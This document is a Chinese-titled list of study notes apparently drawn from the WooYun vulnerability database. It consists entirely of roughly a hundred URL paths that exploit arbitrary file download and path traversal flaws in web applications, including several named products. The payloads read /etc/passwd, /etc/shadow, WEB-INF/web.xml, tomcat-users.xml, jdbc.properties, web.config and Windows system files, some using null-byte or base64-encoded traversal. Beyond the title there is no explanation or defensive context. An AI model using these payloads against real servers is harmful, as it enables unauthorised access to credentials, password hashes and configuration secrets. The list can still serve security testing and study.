乌云漏洞库学习记录
/download!downLoad?filepath=
/download?filePath=
/pages/sacinfo/downloadFile.action?inputPath=WEB-INF/web.xml&fileName=
/webappservice/TP050102.do?FileName=
/recruit/biz09/T090101.shtml?fileName=
/common/LoadFile.jsp?FileName=../WEB-INF/web.xml
/downloadClause?fileName=
/downLoad.jsp?filename=../../../WEB-INF/web.xml
/site/download?filePath=../../../../../../etc/passwd
/cms/web/downloadFiles.jsp?file=
/fileDownloadServlet&fileName=../conf/web.xml
/view/download?path=../../conf/tomcat-users.xml
/nlpcxbrl/download.action?inputPath=/&fileName=etc/passwd
/download.php?file=/etc/passwd
/modules/audit/email_download.php?file=/etc/passwd
/modules/audit/download.php?file=/etc/passwd
/index.php?m=index&c=contactus&a=fileDown&pdfname=../../../etc/passwd
/viewsharenetdisk.php?userid=postmaster&opt=sharelink&filename=Li4vLi4vZGF0YQ==
/viewsharenetdisk.php?userid=postmaster&opt=view&filename=
/download.jsp?jpgfilepath=c:\boot.ini%00\jpg\..\&outfiletype=xls
/recruit/rckgl/download.jsp?zipFile=/etc/shadow
/dl/app/download.do?fn=../../../../../../../../../../etc/shadow
/test?inputFile=C:\Windows\system32\drivers\etc\hosts
/live800/downlog.jsp?path=/&fileName=/etc/passwd
/NCFindWeb?service=IPreAlertConfigService&filename=../../ierp/bin/prop.xml
/download?file=../../../../../../../../../../etc/passwd%00.xls
/downLoadFile.action?filePath=/doc/../../../../../../../etc/shadow
/download/download.php?file=../../../../../../../../../../../etc/passwd
/cw/skin1/jsp/download.jsp?file=/WEB-INF/web.xml
/downloadContract.action?inputPath=%2FWEB-INF%2Fweb.xml
/downloadFile.php?fileName=
/downfile.php?dir=../../../../../../../../../../etc/passwd%00.jpg&file=003.doc
/download.php?fdoc=download.php
/?c=down&m=index&filename=../../../index.php
/news/download.jsp?fileName=
/download?fileName=
/orthopedics/download.php?name=
/download.php?file=
/mdm_2/downloadAction.action?fileName=&realName=
/wappush/dumpSourceDownld.php?file=../../../../etc/passwd
/downloadfile.php?file=
/news.do?method=downloadFile&fileName=../../../WEB-INF/web.xml
/DownLoadFile.php?File=../../../../etc/passwd
/childNews.do?method=downloadFile&fileName=../../../WEB-INF/struts-config.xml
/download/etc/shadow
/web/DownFile.aspx?Path=/web.config
/cw/skin1/jsp/download.jsp?file=../../../../etc/shadow
/data.php?file=../../../etc/passwd
/downloadfile.php?path=
/cms/web/jspdownload.jsp?FileUrl=/etc/shadow
/aiap/other/download.dsr?file=/../../../../../../../../../etc/passwd
/slavefile.jsp?filePath=/opt/jboss/standalone/configuration/standalone.xml
/ec/login.do?action=download&fileUrl=%2FWEB-INF/&fileName=web.xml
/platform/framework/global/down.jsp?link=/WEB-INF/web.xml
/oa/admin/application/file_download.jsp?filePath=c:\windows\system.ini
/file_download.jsp?filePath=C:\Windows\System32\drivers\etc\services
/main/file_download.jsp?dirname=/file/&filename=
/UploadHandler.ashx?action=download&fp=../../web.config
/ftp.php?filename=index.php
/images.do?filename=
/index.php?a=download&file=
/cplectures/include/getfile.php?file=getfile.php&filepath=../include&filename=getfile.php
/include/getfile.php?filepath=路径&file=名字+格式&filename=名字
/developerDemo/demoDownload.jsp?file=../../../../../../../../../etc/passwd
/Picture?imagePath=
/downproject.php?u=../../../../../../../../../../../etc/passwd
/yyoa/seeyonDownLoadPic?filename=../../../../../../../../../../windows/win.ini&userFileType=1
/news/downLoad.jsp?filePath=../../../../../../../../../../etc/passwd%00.pdf
/live/downloadserver?fid=/&act=2&isAbleZip=0&fna=../../../etc/shadow&a=1
/oim/downloadserver?fid=/&act=2&isAbleZip=0&fna=../../../../../etc/passwd&a=1
/downlog.jsp?path=/&fileName=/C:\Windows\system.ini
/downlog.jsp?path=/&fileName=/etc/passwd
/down.jsp?Tempfile=../../../conf/tomcat-users.xml
/pingajs/dl?fn=web.xml&p=../WEB-INF/web.xml
/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd
/pur_portal/download.jsp?filename=../../../../../../../../../../../../../../../etc/passwd
/personnel/leave/download/?filename=a.php&file=../ThinkPHP/thinkphp.php
/Tra/pub/common/getImgPath.do?path= L2V0Yy9ob3N0cw==
/phrs/servlet/downloadServlet?filename=/etc/passwd
/file.php?Cmd=download&filename=../../../../../../etc/passwd&path=
/zfoa/gwxxbviewhtml.do?theAction=downdoc&htwj_recordid=../../WEB-INF/web.xml%00
/portal/news/download.jsp?urli=/WEB-INF/web.xml&filename=1.txt
/admincp.php?mod=down&path=data/bakup/&file=../../index.php
/do_download.jsp?path=C:\Windows\System32\drivers\etc\hosts&isLogin=1
/itc/attachment_downloadByUrlAtt.action?filePath=file://
/download2.aspx?fn=../web.config
/fileServer/fileUpload/downloadFile.jsp?filePath=/WEB-INF/web.xml
/ImageShowServlet?para=fcs123&filetype=1&filePath=../../../../../../../../../etc/passwd%00
/oa/fileDownload.do?type=File&path=/../webapp/WEB-INF/web.xml
/tools/download.php?src=../../index.php
/personBase.do?method=Df_openLicense&licenseName=D:\\archivefile\\zhaopian\202.jpg
/show.jsp?&dir=C:\boot.ini
/down.down?f=../WEB-INF/classes/action/default-struts.xml
/nbs/DownLoadServlet?fileName=&filePath=
/DirectoryListing.asp?Dir=c:\
/defaultroot/download.jsp?FileName=xxx&name=xxx.pdf&path=information
/downfile.php?filename=downfile.php
/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini
/download/export.action?downloadForm.toolPosition=/WEB-INF/classes/jdbc.properties